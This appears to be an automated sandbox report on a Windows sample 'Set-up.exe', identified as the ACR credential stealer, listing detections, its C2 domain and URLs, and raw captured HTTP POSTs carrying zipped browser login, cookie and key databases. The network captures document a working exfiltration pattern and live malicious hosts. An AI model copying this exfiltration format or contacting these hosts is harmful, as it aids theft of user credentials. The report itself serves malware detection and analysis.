Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\Default\Documents	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Directory queried: C:\Users\Default\Documents	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Set-up.exe PID: 7468, type: MEMORYSTR

Remote Access Functionality

Yara detected ACR Stealer

Source: Yara match

File source: Process Memory Space: Set-up.exe PID: 7468, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.96.3	unknown	European Union		13335	CLOUDFLARENETUS	true

Contacted Domains

Name	IP	Active
bg.microsoft.map.fastly.net	199.232.210.172	true
pki-goog.l.google.com	142.250.68.227	true
c.pki.goog	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://mcrsftuptade.pro/Up/g	true	Avira URL Cloud: malware	unknown
http://mcrsftuptade.pro/Up/p	true	Avira URL Cloud: malware	unknown
http://mcrsftuptade.pro/Up/b	true	Avira URL Cloud: malware	unknown
http://mcrsftuptade.pro/ujs/f1575b64-8492-4e8b-b102-4d26e8c70371	true	Avira URL Cloud: malware	unknown
http://mcrsftuptade.pro/Up	true	Avira URL Cloud: malware	unknown

AV Detection

Antivirus detection for URL or domain

Source: http://mcrsftuptade.pro/Up/g	Avira URL Cloud: Label: malware
Source: http://mcrsftuptade.pro/Up/p	Avira URL Cloud: Label: malware
Source: http://mcrsftuptade.pro/Up/b	Avira URL Cloud: Label: malware
Source: http://mcrsftuptade.pro/ujs/f1575b64-8492-4e8b-b102-4d26e8c70371	Avira URL Cloud: Label: malware
Source: http://mcrsftuptade.pro/Up	Avira URL Cloud: Label: malware

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Neural Call Log Analysis: 90.1%

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_02682F00 LoadLibraryA,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,CryptUnprotectData,FreeLibrary,FreeLibrary,FreeLibrary,

0_2_02682F00

Uses 32bit PE files

Source: Set-up.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: Set-up.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2052674 - Severity 1 - ET MALWARE ACR Stealer CnC Checkin Attempt : 192.168.2.5:49691 -> 188.114.96.3:80

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /ujs/f1575b64-8492-4e8b-b102-4d26e8c70371 HTTP/1.1Host: mcrsftuptade.proConnection: close
Source: global traffic	HTTP traffic detected: POST /Up HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 291Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 6b 5b 94 e6 71 00 00 00 71 00 00 00 28 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 7b 22 6c 22 3a 22 31 37 34 36 38 35 37 31 32 36 31 34 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 2c 22 62 74 22 3a 22 5a 41 45 42 41 22 2c 22 68 69 22 3a 22 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 22 7d 50 4b 01 02 14 00 14 00 00 00 00 00 5c 64 21 52 6b 5b 94 e6 71 00 00 00 71 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 31 35 37 35 62 36 34 2d 38 34 39 32 2d 34 65 38 62 2d 62 31 30 32 2d 34 64 32 36 65 38 63 37 30 33 37 31 2e 74 78 74 50 4b 05 06 00 00 00 00 01 00 01 00 56 00 00 00 b7 00 00 00 00 00 Data Ascii: PK\d!Rk[qq(f1575b64-8492-4e8b-b102-4d26e8c70371.txt{"l":"1746857126149e146be9-c76a-4720-bcdb-53011b87bd06","bt":"ZAEBA","hi":"9e146be9-c76a-4720-bcdb-53011b87bd06"}PK\d!Rk[qq(f1575b64-8492-4e8b-b102-4d26e8c70371.txtPKV
Source: global traffic	HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 41649Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 c3 94 76 3c 00 a0 00 00 00 a0 00 00 11 00 00 00 62 2f 63 38 2f 30 2f 4c 6f 67 69 6e 20 44 61 74 61 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 02 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 2e 7a 70 05 00 00 00 01 07 fb 00 00 00 00 0d 07 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 51889Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 e5 a5 64 a8 00 c8 00 00 00 c8 00 00 11 00 00 00 62 2f 63 39 2f 30 2f 4c 6f 67 69 6e 20 44 61 74 61 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 01 00 00 00 19 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 2e 6a d0 05 00 00 00 02 07 f6 00 00 00 00 18 07 fb 07 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 524940Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 33 2e 64 62 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 90 a5 8e 8e 00 80 04 00 00 80 04 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 34 2e 64 62 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 80 00 01 01 00 40 20 20 00 00 00 02 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 2e 6a d0 0d 7f f8 00 08 7a 3c 00 7b ee 7f c3 7b a9 7b 61 7b 1f 7a db 7a 3c 7a aa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 25259Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 a9 82 77 8d 00 60 00 00 00 60 00 00 0e 00 00 00 62 2f 63 38 2f 30 2f 43 6f 6f 6b 69 65 73 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 10 00 01 01 00 40 20 20 00 00 00 0c 00 00 00 06 00 00 00 04 00 00 00 01 00 00 00 17 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 2e 7a 70 0d 0d 18 00 04 09 f1 00 0f 67 0f cf 0a ae 09 f1 09 f1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 21163Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 23 6d d8 2e 00 50 00 00 00 50 00 00 0e 00 00 00 62 2f 63 39 2f 30 2f 43 6f 6f 6b 69 65 73 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 10 00 01 01 00 40 20 20 00 00 00 07 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 05 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 2e 6a d0 0d 0d 24 00 04 0a 0c 00 0f 67 0f cf 0a 0c 0c 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: POST /Up/b HTTP/1.1Host: mcrsftuptade.proConnection: closeContent-Length: 623250Content-Type: application/octet-streamData Raw: 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 33 2e 64 62 50 4b 03 04 14 00 00 00 00 00 5c 64 21 52 90 a5 8e 8e 00 80 04 00 00 80 04 00 0e 00 00 00 62 2f 67 31 2f 30 2f 6b 65 79 34 2e 64 62 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 80 00 01 01 00 40 20 20 00 00 00 02 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 2e 6a d0 0d 7f f8 00 08 7a 3c 00 7b ee 7f c3 7b a9 7b 61 7b 1f 7a db 7a 3c 7a aa 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
